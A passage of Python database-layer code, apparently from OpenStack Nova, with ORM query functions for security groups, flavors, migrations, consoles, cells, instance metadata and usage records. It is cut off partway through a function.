def block_device_mapping_destroy_by_instance_and_volume(context, instance_uuid,
volume_id):
_block_device_mapping_get_query(context).\
filter_by(instance_uuid=instance_uuid).\
filter_by(volume_id=volume_id).\
soft_delete()
@require_context
@pick_context_manager_writer
def block_device_mapping_destroy_by_instance_and_device(context, instance_uuid,
device_name):
_block_device_mapping_get_query(context).\
filter_by(instance_uuid=instance_uuid).\
filter_by(device_name=device_name).\
soft_delete()
###################
@require_context
@main_context_manager.writer
def security_group_create(context, values):
security_group_ref = models.SecurityGroup()
# FIXME(devcamcar): Unless I do this, rules fails with lazy load exception
# once save() is called. This will get cleaned up in next orm pass.
security_group_ref.rules
security_group_ref.update(values)
try:
with main_context_manager.writer.savepoint.using(context):
security_group_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.SecurityGroupExists(
project_id=values['project_id'],
security_group_name=values['name'])
return security_group_ref
def _security_group_get_query(context, read_deleted=None,
project_only=False, join_rules=True):
query = model_query(context, models.SecurityGroup,
read_deleted=read_deleted, project_only=project_only)
if join_rules:
query = query.options(joinedload_all('rules.grantee_group'))
return query
def _security_group_get_by_names(context, project_id, group_names):
"""Get security group models for a project by a list of names.
Raise SecurityGroupNotFoundForProject for a name not found.
"""
query = _security_group_get_query(context, read_deleted="no",
join_rules=False).\
filter_by(project_id=project_id).\
filter(models.SecurityGroup.name.in_(group_names))
sg_models = query.all()
if len(sg_models) == len(group_names):
return sg_models
# Find the first one missing and raise
group_names_from_models = [x.name for x in sg_models]
for group_name in group_names:
if group_name not in group_names_from_models:
raise exception.SecurityGroupNotFoundForProject(
project_id=project_id, security_group_id=group_name)
# Not Reached
@require_context
@main_context_manager.reader
def security_group_get_all(context):
return _security_group_get_query(context).all()
@require_context
@main_context_manager.reader
def security_group_get(context, security_group_id, columns_to_join=None):
query = _security_group_get_query(context, project_only=True).\
filter_by(id=security_group_id)
if columns_to_join is None:
columns_to_join = []
for column in columns_to_join:
if column.startswith('instances'):
query = query.options(joinedload_all(column))
result = query.first()
if not result:
raise exception.SecurityGroupNotFound(
security_group_id=security_group_id)
return result
@require_context
@main_context_manager.reader
def security_group_get_by_name(context, project_id, group_name,
columns_to_join=None):
query = _security_group_get_query(context,
read_deleted="no", join_rules=False).\
filter_by(project_id=project_id).\
filter_by(name=group_name)
if columns_to_join is None:
columns_to_join = ['instances', 'rules.grantee_group']
for column in columns_to_join:
query = query.options(joinedload_all(column))
result = query.first()
if not result:
raise exception.SecurityGroupNotFoundForProject(
project_id=project_id, security_group_id=group_name)
return result
@require_context
@main_context_manager.reader
def security_group_get_by_project(context, project_id):
return _security_group_get_query(context, read_deleted="no").\
filter_by(project_id=project_id).\
all()
@require_context
@main_context_manager.reader
def security_group_get_by_instance(context, instance_uuid):
return _security_group_get_query(context, read_deleted="no").\
join(models.SecurityGroup.instances).\
filter_by(uuid=instance_uuid).\
all()
@require_context
@main_context_manager.reader
def security_group_in_use(context, group_id):
# Are there any instances that haven't been deleted
# that include this group?
inst_assoc = model_query(context,
models.SecurityGroupInstanceAssociation,
read_deleted="no").\
filter_by(security_group_id=group_id).\
all()
for ia in inst_assoc:
num_instances = model_query(context, models.Instance,
read_deleted="no").\
filter_by(uuid=ia.instance_uuid).\
count()
if num_instances:
return True
return False
@require_context
@main_context_manager.writer
def security_group_update(context, security_group_id, values,
columns_to_join=None):
query = model_query(context, models.SecurityGroup).filter_by(
id=security_group_id)
if columns_to_join:
for column in columns_to_join:
query = query.options(joinedload_all(column))
security_group_ref = query.first()
if not security_group_ref:
raise exception.SecurityGroupNotFound(
security_group_id=security_group_id)
security_group_ref.update(values)
name = security_group_ref['name']
project_id = security_group_ref['project_id']
try:
security_group_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.SecurityGroupExists(
project_id=project_id,
security_group_name=name)
return security_group_ref
def security_group_ensure_default(context):
"""Ensure default security group exists for a project_id."""
try:
# NOTE(rpodolyaka): create the default security group, if it doesn't
# exist. This must be done in a separate transaction, so that
# this one is not aborted in case a concurrent one succeeds first
# and the unique constraint for security group names is violated
# by a concurrent INSERT
with main_context_manager.writer.independent.using(context):
return _security_group_ensure_default(context)
except exception.SecurityGroupExists:
# NOTE(rpodolyaka): a concurrent transaction has succeeded first,
# suppress the error and proceed
return security_group_get_by_name(context, context.project_id,
'default')
@main_context_manager.writer
def _security_group_ensure_default(context):
try:
default_group = _security_group_get_by_names(context,
context.project_id,
['default'])[0]
except exception.NotFound:
values = {'name': 'default',
'description': 'default',
'user_id': context.user_id,
'project_id': context.project_id}
default_group = security_group_create(context, values)
usage = model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=context.project_id).\
filter_by(user_id=context.user_id).\
filter_by(resource='security_groups')
# Create quota usage for auto created default security group
if not usage.first():
_quota_usage_create(context.project_id,
context.user_id,
'security_groups',
1, 0,
CONF.until_refresh,
context.session)
else:
usage.update({'in_use': int(usage.first().in_use) + 1})
default_rules = _security_group_rule_get_default_query(context).all()
for default_rule in default_rules:
# This is suboptimal, it should be programmatic to know
# the values of the default_rule
rule_values = {'protocol': default_rule.protocol,
'from_port': default_rule.from_port,
'to_port': default_rule.to_port,
'cidr': default_rule.cidr,
'parent_group_id': default_group.id,
}
_security_group_rule_create(context, rule_values)
return default_group
@require_context
@main_context_manager.writer
def security_group_destroy(context, security_group_id):
model_query(context, models.SecurityGroup).\
filter_by(id=security_group_id).\
soft_delete()
model_query(context, models.SecurityGroupInstanceAssociation).\
filter_by(security_group_id=security_group_id).\
soft_delete()
model_query(context, models.SecurityGroupIngressRule).\
filter_by(group_id=security_group_id).\
soft_delete()
model_query(context, models.SecurityGroupIngressRule).\
filter_by(parent_group_id=security_group_id).\
soft_delete()
def _security_group_count_by_project_and_user(context, project_id, user_id):
nova.context.authorize_project_context(context, project_id)
return model_query(context, models.SecurityGroup, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
count()
###################
def _security_group_rule_create(context, values):
security_group_rule_ref = models.SecurityGroupIngressRule()
security_group_rule_ref.update(values)
security_group_rule_ref.save(context.session)
return security_group_rule_ref
def _security_group_rule_get_query(context):
return model_query(context, models.SecurityGroupIngressRule)
@require_context
@main_context_manager.reader
def security_group_rule_get(context, security_group_rule_id):
result = (_security_group_rule_get_query(context).
filter_by(id=security_group_rule_id).
first())
if not result:
raise exception.SecurityGroupNotFoundForRule(
rule_id=security_group_rule_id)
return result
@require_context
@main_context_manager.reader
def security_group_rule_get_by_security_group(context, security_group_id,
columns_to_join=None):
if columns_to_join is None:
columns_to_join = ['grantee_group.instances.system_metadata',
'grantee_group.instances.info_cache']
query = (_security_group_rule_get_query(context).
filter_by(parent_group_id=security_group_id))
for column in columns_to_join:
query = query.options(joinedload_all(column))
return query.all()
@require_context
@main_context_manager.reader
def security_group_rule_get_by_instance(context, instance_uuid):
return (_security_group_rule_get_query(context).
join('parent_group', 'instances').
filter_by(uuid=instance_uuid).
options(joinedload('grantee_group')).
all())
@require_context
@main_context_manager.writer
def security_group_rule_create(context, values):
return _security_group_rule_create(context, values)
@require_context
@main_context_manager.writer
def security_group_rule_destroy(context, security_group_rule_id):
count = (_security_group_rule_get_query(context).
filter_by(id=security_group_rule_id).
soft_delete())
if count == 0:
raise exception.SecurityGroupNotFoundForRule(
rule_id=security_group_rule_id)
@require_context
@main_context_manager.reader
def security_group_rule_count_by_group(context, security_group_id):
return (model_query(context, models.SecurityGroupIngressRule,
read_deleted="no").
filter_by(parent_group_id=security_group_id).
count())
###################
def _security_group_rule_get_default_query(context):
return model_query(context, models.SecurityGroupIngressDefaultRule)
@require_context
@main_context_manager.reader
def security_group_default_rule_get(context, security_group_rule_default_id):
result = _security_group_rule_get_default_query(context).\
filter_by(id=security_group_rule_default_id).\
first()
if not result:
raise exception.SecurityGroupDefaultRuleNotFound(
rule_id=security_group_rule_default_id)
return result
@main_context_manager.writer
def security_group_default_rule_destroy(context,
security_group_rule_default_id):
count = _security_group_rule_get_default_query(context).\
filter_by(id=security_group_rule_default_id).\
soft_delete()
if count == 0:
raise exception.SecurityGroupDefaultRuleNotFound(
rule_id=security_group_rule_default_id)
@main_context_manager.writer
def security_group_default_rule_create(context, values):
security_group_default_rule_ref = models.SecurityGroupIngressDefaultRule()
security_group_default_rule_ref.update(values)
security_group_default_rule_ref.save(context.session)
return security_group_default_rule_ref
@require_context
@main_context_manager.reader
def security_group_default_rule_list(context):
return _security_group_rule_get_default_query(context).all()
###################
@main_context_manager.writer
def provider_fw_rule_create(context, rule):
fw_rule_ref = models.ProviderFirewallRule()
fw_rule_ref.update(rule)
fw_rule_ref.save(context.session)
return fw_rule_ref
@main_context_manager.reader
def provider_fw_rule_get_all(context):
return model_query(context, models.ProviderFirewallRule).all()
@main_context_manager.writer
def provider_fw_rule_destroy(context, rule_id):
context.session.query(models.ProviderFirewallRule).\
filter_by(id=rule_id).\
soft_delete()
###################
@require_context
@main_context_manager.writer
def project_get_networks(context, project_id, associate=True):
# NOTE(tr3buchet): as before this function will associate
# a project with a network if it doesn't have one and
# associate is true
result = model_query(context, models.Network, read_deleted="no").\
filter_by(project_id=project_id).\
all()
if not result:
if not associate:
return []
return [network_associate(context, project_id)]
return result
###################
@pick_context_manager_writer
def migration_create(context, values):
migration = models.Migration()
migration.update(values)
migration.save(context.session)
return migration
@pick_context_manager_writer
def migration_update(context, id, values):
migration = migration_get(context, id)
migration.update(values)
return migration
@pick_context_manager_reader
def migration_get(context, id):
result = model_query(context, models.Migration, read_deleted="yes").\
filter_by(id=id).\
first()
if not result:
raise exception.MigrationNotFound(migration_id=id)
return result
@pick_context_manager_reader
def migration_get_by_id_and_instance(context, id, instance_uuid):
result = model_query(context, models.Migration).\
filter_by(id=id).\
filter_by(instance_uuid=instance_uuid).\
first()
if not result:
raise exception.MigrationNotFoundForInstance(migration_id=id,
instance_id=instance_uuid)
return result
@pick_context_manager_reader
def migration_get_by_instance_and_status(context, instance_uuid, status):
result = model_query(context, models.Migration, read_deleted="yes").\
filter_by(instance_uuid=instance_uuid).\
filter_by(status=status).\
first()
if not result:
raise exception.MigrationNotFoundByStatus(instance_id=instance_uuid,
status=status)
return result
@pick_context_manager_reader_allow_async
def migration_get_unconfirmed_by_dest_compute(context, confirm_window,
dest_compute):
confirm_window = (timeutils.utcnow() -
datetime.timedelta(seconds=confirm_window))
return model_query(context, models.Migration, read_deleted="yes").\
filter(models.Migration.updated_at <= confirm_window).\
filter_by(status="finished").\
filter_by(dest_compute=dest_compute).\
all()
@pick_context_manager_reader
def migration_get_in_progress_by_host_and_node(context, host, node):
return model_query(context, models.Migration).\
filter(or_(and_(models.Migration.source_compute == host,
models.Migration.source_node == node),
and_(models.Migration.dest_compute == host,
models.Migration.dest_node == node))).\
filter(~models.Migration.status.in_(['accepted', 'confirmed',
'reverted', 'error',
'failed'])).\
options(joinedload_all('instance.system_metadata')).\
all()
@pick_context_manager_reader
def migration_get_in_progress_by_instance(context, instance_uuid,
migration_type=None):
# TODO(Shaohe Feng) we should share the in-progress list.
# TODO(Shaohe Feng) will also summarize all status to a new
# MigrationStatus class.
query = model_query(context, models.Migration).\
filter_by(instance_uuid=instance_uuid).\
filter(models.Migration.status.in_(['queued', 'preparing',
'running',
'post-migrating']))
if migration_type:
query = query.filter(models.Migration.migration_type == migration_type)
return query.all()
@pick_context_manager_reader
def migration_get_all_by_filters(context, filters):
query = model_query(context, models.Migration)
if "status" in filters:
status = filters["status"]
status = [status] if isinstance(status, str) else status
query = query.filter(models.Migration.status.in_(status))
if "host" in filters:
host = filters["host"]
query = query.filter(or_(models.Migration.source_compute == host,
models.Migration.dest_compute == host))
elif "source_compute" in filters:
host = filters['source_compute']
query = query.filter(models.Migration.source_compute == host)
if "migration_type" in filters:
migtype = filters["migration_type"]
query = query.filter(models.Migration.migration_type == migtype)
if "hidden" in filters:
hidden = filters["hidden"]
query = query.filter(models.Migration.hidden == hidden)
return query.all()
##################
@pick_context_manager_writer
def console_pool_create(context, values):
pool = models.ConsolePool()
pool.update(values)
try:
pool.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.ConsolePoolExists(
host=values["host"],
console_type=values["console_type"],
compute_host=values["compute_host"],
)
return pool
@pick_context_manager_reader
def console_pool_get_by_host_type(context, compute_host, host,
console_type):
result = model_query(context, models.ConsolePool, read_deleted="no").\
filter_by(host=host).\
filter_by(console_type=console_type).\
filter_by(compute_host=compute_host).\
options(joinedload('consoles')).\
first()
if not result:
raise exception.ConsolePoolNotFoundForHostType(
host=host, console_type=console_type,
compute_host=compute_host)
return result
@pick_context_manager_reader
def console_pool_get_all_by_host_type(context, host, console_type):
return model_query(context, models.ConsolePool, read_deleted="no").\
filter_by(host=host).\
filter_by(console_type=console_type).\
options(joinedload('consoles')).\
all()
##################
@pick_context_manager_writer
def console_create(context, values):
console = models.Console()
console.update(values)
console.save(context.session)
return console
@pick_context_manager_writer
def console_delete(context, console_id):
# NOTE(mdragon): consoles are meant to be transient.
context.session.query(models.Console).\
filter_by(id=console_id).\
delete()
@pick_context_manager_reader
def console_get_by_pool_instance(context, pool_id, instance_uuid):
result = model_query(context, models.Console, read_deleted="yes").\
filter_by(pool_id=pool_id).\
filter_by(instance_uuid=instance_uuid).\
options(joinedload('pool')).\
first()
if not result:
raise exception.ConsoleNotFoundInPoolForInstance(
pool_id=pool_id, instance_uuid=instance_uuid)
return result
@pick_context_manager_reader
def console_get_all_by_instance(context, instance_uuid, columns_to_join=None):
query = model_query(context, models.Console, read_deleted="yes").\
filter_by(instance_uuid=instance_uuid)
if columns_to_join:
for column in columns_to_join:
query = query.options(joinedload(column))
return query.all()
@pick_context_manager_reader
def console_get(context, console_id, instance_uuid=None):
query = model_query(context, models.Console, read_deleted="yes").\
filter_by(id=console_id).\
options(joinedload('pool'))
if instance_uuid is not None:
query = query.filter_by(instance_uuid=instance_uuid)
result = query.first()
if not result:
if instance_uuid:
raise exception.ConsoleNotFoundForInstance(
console_id=console_id, instance_uuid=instance_uuid)
else:
raise exception.ConsoleNotFound(console_id=console_id)
return result
##################
@main_context_manager.writer
def flavor_create(context, values, projects=None):
"""Create a new instance type. In order to pass in extra specs,
the values dict should contain a 'extra_specs' key/value pair:
{'extra_specs' : {'k1': 'v1', 'k2': 'v2', ...}}
"""
specs = values.get('extra_specs')
specs_refs = []
if specs:
for k, v in specs.items():
specs_ref = models.InstanceTypeExtraSpecs()
specs_ref['key'] = k
specs_ref['value'] = v
specs_refs.append(specs_ref)
values['extra_specs'] = specs_refs
instance_type_ref = models.InstanceTypes()
instance_type_ref.update(values)
if projects is None:
projects = []
try:
instance_type_ref.save(context.session)
except db_exc.DBDuplicateEntry as e:
if 'flavorid' in e.columns:
raise exception.FlavorIdExists(flavor_id=values['flavorid'])
raise exception.FlavorExists(name=values['name'])
except Exception as e:
raise db_exc.DBError(e)
for project in set(projects):
access_ref = models.InstanceTypeProjects()
access_ref.update({"instance_type_id": instance_type_ref.id,
"project_id": project})
access_ref.save(context.session)
return _dict_with_extra_specs(instance_type_ref)
def _dict_with_extra_specs(inst_type_query):
"""Takes an instance or instance type query returned
by sqlalchemy and returns it as a dictionary, converting the
extra_specs entry from a list of dicts:
'extra_specs' : [{'key': 'k1', 'value': 'v1', ...}, ...]
to a single dict:
'extra_specs' : {'k1': 'v1'}
"""
inst_type_dict = dict(inst_type_query)
extra_specs = {x['key']: x['value']
for x in inst_type_query['extra_specs']}
inst_type_dict['extra_specs'] = extra_specs
return inst_type_dict
def _flavor_get_query(context, read_deleted=None):
query = model_query(context, models.InstanceTypes,
read_deleted=read_deleted).\
options(joinedload('extra_specs'))
if not context.is_admin:
the_filter = [models.InstanceTypes.is_public == true()]
the_filter.extend([
models.InstanceTypes.projects.any(project_id=context.project_id)
])
query = query.filter(or_(*the_filter))
return query
@require_context
@main_context_manager.reader
def flavor_get_all(context, inactive=False, filters=None,
sort_key='flavorid', sort_dir='asc', limit=None,
marker=None):
"""Returns all flavors.
"""
filters = filters or {}
# FIXME(sirp): now that we have the `disabled` field for flavors, we
# should probably remove the use of `deleted` to mark inactive. `deleted`
# should mean truly deleted, e.g. we can safely purge the record out of the
# database.
read_deleted = "yes" if inactive else "no"
query = _flavor_get_query(context, read_deleted=read_deleted)
if 'min_memory_mb' in filters:
query = query.filter(
models.InstanceTypes.memory_mb >= filters['min_memory_mb'])
if 'min_root_gb' in filters:
query = query.filter(
models.InstanceTypes.root_gb >= filters['min_root_gb'])
if 'disabled' in filters:
query = query.filter(
models.InstanceTypes.disabled == filters['disabled'])
if 'is_public' in filters and filters['is_public'] is not None:
the_filter = [models.InstanceTypes.is_public == filters['is_public']]
if filters['is_public'] and context.project_id is not None:
the_filter.extend([
models.InstanceTypes.projects.any(
project_id=context.project_id, deleted=0)
])
if len(the_filter) > 1:
query = query.filter(or_(*the_filter))
else:
query = query.filter(the_filter[0])
marker_row = None
if marker is not None:
marker_row = _flavor_get_query(context, read_deleted=read_deleted).\
filter_by(flavorid=marker).\
first()
if not marker_row:
raise exception.MarkerNotFound(marker)
query = sqlalchemyutils.paginate_query(query, models.InstanceTypes, limit,
[sort_key, 'id'],
marker=marker_row,
sort_dir=sort_dir)
inst_types = query.all()
return [_dict_with_extra_specs(i) for i in inst_types]
def _flavor_get_id_from_flavor_query(context, flavor_id):
return model_query(context, models.InstanceTypes,
(models.InstanceTypes.id,),
read_deleted="no").\
filter_by(flavorid=flavor_id)
def _flavor_get_id_from_flavor(context, flavor_id):
result = _flavor_get_id_from_flavor_query(context, flavor_id).first()
if not result:
raise exception.FlavorNotFound(flavor_id=flavor_id)
return result[0]
@require_context
@main_context_manager.reader
def flavor_get(context, id):
"""Returns a dict describing specific flavor."""
result = _flavor_get_query(context).\
filter_by(id=id).\
first()
if not result:
raise exception.FlavorNotFound(flavor_id=id)
return _dict_with_extra_specs(result)
@require_context
@main_context_manager.reader
def flavor_get_by_name(context, name):
"""Returns a dict describing specific flavor."""
result = _flavor_get_query(context).\
filter_by(name=name).\
first()
if not result:
raise exception.FlavorNotFoundByName(flavor_name=name)
return _dict_with_extra_specs(result)
@require_context
@main_context_manager.reader
def flavor_get_by_flavor_id(context, flavor_id, read_deleted):
"""Returns a dict describing specific flavor_id."""
result = _flavor_get_query(context, read_deleted=read_deleted).\
filter_by(flavorid=flavor_id).\
order_by(asc(models.InstanceTypes.deleted),
asc(models.InstanceTypes.id)).\
first()
if not result:
raise exception.FlavorNotFound(flavor_id=flavor_id)
return _dict_with_extra_specs(result)
@main_context_manager.writer
def flavor_destroy(context, name):
"""Marks specific flavor as deleted."""
ref = model_query(context, models.InstanceTypes, read_deleted="no").\
filter_by(name=name).\
first()
if not ref:
raise exception.FlavorNotFoundByName(flavor_name=name)
ref.soft_delete(context.session)
model_query(context, models.InstanceTypeExtraSpecs, read_deleted="no").\
filter_by(instance_type_id=ref['id']).\
soft_delete()
model_query(context, models.InstanceTypeProjects, read_deleted="no").\
filter_by(instance_type_id=ref['id']).\
soft_delete()
def _flavor_access_query(context):
return model_query(context, models.InstanceTypeProjects, read_deleted="no")
@main_context_manager.reader
def flavor_access_get_by_flavor_id(context, flavor_id):
"""Get flavor access list by flavor id."""
instance_type_id_subq = _flavor_get_id_from_flavor_query(context,
flavor_id)
access_refs = _flavor_access_query(context).\
filter_by(instance_type_id=instance_type_id_subq).\
all()
return access_refs
@main_context_manager.writer
def flavor_access_add(context, flavor_id, project_id):
"""Add given tenant to the flavor access list."""
instance_type_id = _flavor_get_id_from_flavor(context, flavor_id)
access_ref = models.InstanceTypeProjects()
access_ref.update({"instance_type_id": instance_type_id,
"project_id": project_id})
try:
access_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.FlavorAccessExists(flavor_id=flavor_id,
project_id=project_id)
return access_ref
@main_context_manager.writer
def flavor_access_remove(context, flavor_id, project_id):
"""Remove given tenant from the flavor access list."""
instance_type_id = _flavor_get_id_from_flavor(context, flavor_id)
count = _flavor_access_query(context).\
filter_by(instance_type_id=instance_type_id).\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
if count == 0:
raise exception.FlavorAccessNotFound(flavor_id=flavor_id,
project_id=project_id)
def _flavor_extra_specs_get_query(context, flavor_id):
instance_type_id_subq = _flavor_get_id_from_flavor_query(context,
flavor_id)
return model_query(context, models.InstanceTypeExtraSpecs,
read_deleted="no").\
filter_by(instance_type_id=instance_type_id_subq)
@require_context
@main_context_manager.reader
def flavor_extra_specs_get(context, flavor_id):
rows = _flavor_extra_specs_get_query(context, flavor_id).all()
return {row['key']: row['value'] for row in rows}
@require_context
@main_context_manager.writer
def flavor_extra_specs_delete(context, flavor_id, key):
result = _flavor_extra_specs_get_query(context, flavor_id).\
filter(models.InstanceTypeExtraSpecs.key == key).\
soft_delete(synchronize_session=False)
# did not find the extra spec
if result == 0:
raise exception.FlavorExtraSpecsNotFound(
extra_specs_key=key, flavor_id=flavor_id)
@require_context
@main_context_manager.writer
def flavor_extra_specs_update_or_create(context, flavor_id, specs,
max_retries=10):
for attempt in range(max_retries):
try:
instance_type_id = _flavor_get_id_from_flavor(context, flavor_id)
spec_refs = model_query(context, models.InstanceTypeExtraSpecs,
read_deleted="no").\
filter_by(instance_type_id=instance_type_id).\
filter(models.InstanceTypeExtraSpecs.key.in_(specs.keys())).\
all()
existing_keys = set()
for spec_ref in spec_refs:
key = spec_ref["key"]
existing_keys.add(key)
with main_context_manager.writer.savepoint.using(context):
spec_ref.update({"value": specs[key]})
for key, value in specs.items():
if key in existing_keys:
continue
spec_ref = models.InstanceTypeExtraSpecs()
with main_context_manager.writer.savepoint.using(context):
spec_ref.update({"key": key, "value": value,
"instance_type_id": instance_type_id})
context.session.add(spec_ref)
return specs
except db_exc.DBDuplicateEntry:
# a concurrent transaction has been committed,
# try again unless this was the last attempt
if attempt == max_retries - 1:
raise exception.FlavorExtraSpecUpdateCreateFailed(
id=flavor_id, retries=max_retries)
####################
@main_context_manager.writer
def cell_create(context, values):
cell = models.Cell()
cell.update(values)
try:
cell.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.CellExists(name=values['name'])
return cell
def _cell_get_by_name_query(context, cell_name):
return model_query(context, models.Cell).filter_by(name=cell_name)
@main_context_manager.writer
def cell_update(context, cell_name, values):
cell_query = _cell_get_by_name_query(context, cell_name)
if not cell_query.update(values):
raise exception.CellNotFound(cell_name=cell_name)
cell = cell_query.first()
return cell
@main_context_manager.writer
def cell_delete(context, cell_name):
return _cell_get_by_name_query(context, cell_name).soft_delete()
@main_context_manager.reader
def cell_get(context, cell_name):
result = _cell_get_by_name_query(context, cell_name).first()
if not result:
raise exception.CellNotFound(cell_name=cell_name)
return result
@main_context_manager.reader
def cell_get_all(context):
return model_query(context, models.Cell, read_deleted="no").all()
########################
# User-provided metadata
def _instance_metadata_get_multi(context, instance_uuids):
if not instance_uuids:
return []
return model_query(context, models.InstanceMetadata).filter(
models.InstanceMetadata.instance_uuid.in_(instance_uuids))
def _instance_metadata_get_query(context, instance_uuid):
return model_query(context, models.InstanceMetadata, read_deleted="no").\
filter_by(instance_uuid=instance_uuid)
@require_context
@pick_context_manager_reader
def instance_metadata_get(context, instance_uuid):
rows = _instance_metadata_get_query(context, instance_uuid).all()
return {row['key']: row['value'] for row in rows}
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@pick_context_manager_writer
def instance_metadata_delete(context, instance_uuid, key):
_instance_metadata_get_query(context, instance_uuid).\
filter_by(key=key).\
soft_delete()
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@pick_context_manager_writer
def instance_metadata_update(context, instance_uuid, metadata, delete):
all_keys = metadata.keys()
if delete:
_instance_metadata_get_query(context, instance_uuid).\
filter(~models.InstanceMetadata.key.in_(all_keys)).\
soft_delete(synchronize_session=False)
already_existing_keys = []
meta_refs = _instance_metadata_get_query(context, instance_uuid).\
filter(models.InstanceMetadata.key.in_(all_keys)).\
all()
for meta_ref in meta_refs:
already_existing_keys.append(meta_ref.key)
meta_ref.update({"value": metadata[meta_ref.key]})
new_keys = set(all_keys) - set(already_existing_keys)
for key in new_keys:
meta_ref = models.InstanceMetadata()
meta_ref.update({"key": key, "value": metadata[key],
"instance_uuid": instance_uuid})
context.session.add(meta_ref)
return metadata
#######################
# System-owned metadata
def _instance_system_metadata_get_multi(context, instance_uuids):
if not instance_uuids:
return []
return model_query(context, models.InstanceSystemMetadata,
read_deleted='yes').filter(
models.InstanceSystemMetadata.instance_uuid.in_(instance_uuids))
def _instance_system_metadata_get_query(context, instance_uuid):
return model_query(context, models.InstanceSystemMetadata).\
filter_by(instance_uuid=instance_uuid)
@require_context
@pick_context_manager_reader
def instance_system_metadata_get(context, instance_uuid):
rows = _instance_system_metadata_get_query(context, instance_uuid).all()
return {row['key']: row['value'] for row in rows}
@require_context
@pick_context_manager_writer
def instance_system_metadata_update(context, instance_uuid, metadata, delete):
all_keys = metadata.keys()
if delete:
_instance_system_metadata_get_query(context, instance_uuid).\
filter(~models.InstanceSystemMetadata.key.in_(all_keys)).\
soft_delete(synchronize_session=False)
already_existing_keys = []
meta_refs = _instance_system_metadata_get_query(context, instance_uuid).\
filter(models.InstanceSystemMetadata.key.in_(all_keys)).\
all()
for meta_ref in meta_refs:
already_existing_keys.append(meta_ref.key)
meta_ref.update({"value": metadata[meta_ref.key]})
new_keys = set(all_keys) - set(already_existing_keys)
for key in new_keys:
meta_ref = models.InstanceSystemMetadata()
meta_ref.update({"key": key, "value": metadata[key],
"instance_uuid": instance_uuid})
context.session.add(meta_ref)
return metadata
####################
@main_context_manager.writer
def agent_build_create(context, values):
agent_build_ref = models.AgentBuild()
agent_build_ref.update(values)
try:
agent_build_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.AgentBuildExists(hypervisor=values['hypervisor'],
os=values['os'], architecture=values['architecture'])
return agent_build_ref
@main_context_manager.reader
def agent_build_get_by_triple(context, hypervisor, os, architecture):
return model_query(context, models.AgentBuild, read_deleted="no").\
filter_by(hypervisor=hypervisor).\
filter_by(os=os).\
filter_by(architecture=architecture).\
first()
@main_context_manager.reader
def agent_build_get_all(context, hypervisor=None):
if hypervisor:
return model_query(context, models.AgentBuild, read_deleted="no").\
filter_by(hypervisor=hypervisor).\
all()
else:
return model_query(context, models.AgentBuild, read_deleted="no").\
all()
@main_context_manager.writer
def agent_build_destroy(context, agent_build_id):
rows_affected = model_query(context, models.AgentBuild).filter_by(
id=agent_build_id).soft_delete()
if rows_affected == 0:
raise exception.AgentBuildNotFound(id=agent_build_id)
@main_context_manager.writer
def agent_build_update(context, agent_build_id, values):
rows_affected = model_query(context, models.AgentBuild).\
filter_by(id=agent_build_id).\
update(values)
if rows_affected == 0:
raise exception.AgentBuildNotFound(id=agent_build_id)
####################
@require_context
@pick_context_manager_reader_allow_async
def bw_usage_get(context, uuid, start_period, mac):
values = {'start_period': start_period}
values = convert_objects_related_datetimes(values, 'start_period')
return model_query(context, models.BandwidthUsage, read_deleted="yes").\
filter_by(start_period=values['start_period']).\
filter_by(uuid=uuid).\
filter_by(mac=mac).\
first()
@require_context
@pick_context_manager_reader_allow_async
def bw_usage_get_by_uuids(context, uuids, start_period):
values = {'start_period': start_period}
values = convert_objects_related_datetimes(values, 'start_period')
return (
model_query(context, models.BandwidthUsage, read_deleted="yes").
filter(models.BandwidthUsage.uuid.in_(uuids)).
filter_by(start_period=values['start_period']).
all()
)
@require_context
@oslo_db_api.wrap_db_retry(max_retries=5, retry_on_deadlock=True)
@pick_context_manager_writer
def bw_usage_update(context, uuid, mac, start_period, bw_in, bw_out,
last_ctr_in, last_ctr_out, last_refreshed=None):
if last_refreshed is None:
last_refreshed = timeutils.utcnow()
# NOTE(comstud): More often than not, we'll be updating records vs
# creating records. Optimize accordingly, trying to update existing
# records. Fall back to creation when no rows are updated.
ts_values = {'last_refreshed': last_refreshed,
'start_period': start_period}
ts_keys = ('start_period', 'last_refreshed')
ts_values = convert_objects_related_datetimes(ts_values, *ts_keys)
values = {'last_refreshed': ts_values['last_refreshed'],
'last_ctr_in': last_ctr_in,
'last_ctr_out': last_ctr_out,
'bw_in': bw_in,
'bw_out': bw_out}
bw_usage = model_query(context, models.BandwidthUsage,
read_deleted='yes').\
filter_by(start_period=ts_values['start_period']).\
filter_by(uuid=uuid).\
filter_by(mac=mac).first()
if bw_usage:
bw_usage.update(values)
return bw_usage
bwusage = models.BandwidthUsage()
bwusage.start_period = ts_values['start_period']
bwusage.uuid = uuid
bwusage.mac = mac
bwusage.last_refreshed = ts_values['last_refreshed']
bwusage.bw_in = bw_in
bwusage.bw_out = bw_out
bwusage.last_ctr_in = last_ctr_in
bwusage.last_ctr_out = last_ctr_out
try:
bwusage.save(context.session)
except db_exc.DBDuplicateEntry:
# NOTE(sirp): Possible race if two greenthreads attempt to create
# the usage entry at the same time. First one wins.
pass
return bwusage
####################
@require_context
@pick_context_manager_reader
def vol_get_usage_by_time(context, begin):
"""Return volumes usage that have been updated after a specified time."""
return model_query(context, models.VolumeUsage, read_deleted="yes").\
filter(or_(models.VolumeUsage.tot_last_refreshed == null(),
models.VolumeUsage.tot_last_refreshed > begin,
models.VolumeUsage.curr_last_refreshed == null(),
models.VolumeUsage.curr_last_refreshed > begin,
)).all()
@require_context
@pick_context_manager_writer
def vol_usage_update(context, id, rd_req, rd_bytes, wr_req, wr_bytes,
instance_id, project_id, user_id, availability_zone,
update_totals=False):
refreshed = timeutils.utcnow()
values = {}
# NOTE(dricco): We will be mostly updating current usage records vs
# updating total or creating records. Optimize accordingly.
if not update_totals:
values = {'curr_last_refreshed': refreshed,
'curr_reads': rd_req,
'curr_read_bytes': rd_bytes,
'curr_writes': wr_req,
'curr_write_bytes': wr_bytes,
